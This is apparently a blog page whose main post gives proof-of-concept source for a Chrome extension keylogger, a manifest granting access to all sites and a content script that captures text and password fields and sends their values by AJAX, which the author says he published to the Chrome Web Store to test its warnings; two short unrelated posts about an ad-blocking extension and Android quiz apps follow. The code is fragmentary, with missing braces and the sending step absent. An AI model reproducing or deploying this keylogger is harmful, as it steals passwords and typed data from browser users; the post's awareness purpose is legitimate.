A thought (and proof-of-concept) about malicious Chrome extensions

Ok, today I made a simple Chrome extension, and suddenly got very excited about it (yeah I know, almost every blog post I write starts like this). Then reading about the extensions possibilities, I learned that the extensions are not limited by the same-origin policy.

This means that, if an extension made an AJAX request, it could be directed to a server different from the domain of the current page. This can be harmful in some different ways, the first I imagine is a simple keylogger extension which logs everything you type (passwords included) and sends it to a malicious server to collect them.

And that’s what I made, just to understand how difficult it was, and which kind of warning would the Google Web Store issue when you decide to add it to your browser.

Making the malicious extension

Actually, since that you can inject javascript, making the keylogger extension is straightforward: you just have to write two files, a manifest and the script:


  "manifest_version": 2,
"name": "KeyLogger",
"description": "This extension logs everything you type.",
"version": "1.0.1",

"permissions": [
"http://*/*", "https://*/*"

"content_scripts": [{
"matches": ["http://*/*", "https://*/*"],
"js": ["script.js"]


var xmlhttp = new XMLHttpRequest();
console.log('Starting keylogger..')

setInterval( function() {

var inputs = document.getElementsByTagName('input')

var textAreas = document.getElementsByTagName('textarea')

var myLog = function(event) {
var what = encodeURIComponent(event.srcElement.value)

console.log("Logged: " + what)
console.log("Sending data to remote server..")

var getHandler = function(previousHandler,obj) {
return function(e) {
if(previousHandler) previousHandler(e);

for(var i=0; i<inputs.length; i++) {
if(inputs[i].getAttribute('type') == 'text' || inputs[i].getAttribute('type') == 'password') {
inputs[i].onblur = getHandler(inputs[i].onblur,inputs[i])

for(var i=0; i<textAreas.length; i++) {
textAreas[i].onblur = getHandler(textAreas[i].onblur,textAreas[i])

The script is a simple implementation that sends via AJAX requests every text you type in a textbox, password fields included. In this simple proof of concept it sends everything to localhost.

I tried it, and it works.

Installing the extension


I published it to the Chrome Web Store, and tried to install it, to see what kind of warning should show up, and all I got was this:



..not so uncommon for, say, an Advertising blocking extension:



So this blog post is here to remind you that you should use only trusted Chrome extensions. It’s very easy to steal your data with a malicious chrome extension, it’s easy to hide some malicious code in a apparently innocent extensions and after you have installed it, it’s easy to forget about it.

Please don’t do bad things with my code and/or ideas.


Chrome Extension to block sponsored posts on the Facebook timeline

That’s what I did today. I wanted to find out how difficult actually was to make a chrome extension which injects some javascript in a page. After a discussion with some friends about website advertising I got the idea, and made the simple extension.

As part of the test, I registered a Chrome Web Store developer account and published the extension. I’ll post the link here as soon as the extension is accepted.

Update: here’s the link

HTML5 Android apps

Some days ago me and a classmate of mine (Marco Virgolin), due to a lack of serious things to do, developed a simple quiz game as a web app, then we included it in an android app using WebView.

I write this post just to keep track of the projects I’ve been doing.

Here’s the links for the Android apps (yes, we cloned the first and made a second one):


The original: https://play.google.com/store/apps/details?id=com.quizdurello.quixxx

and the clone: https://play.google.com/store/apps/details?id=com.quizes.quizdogs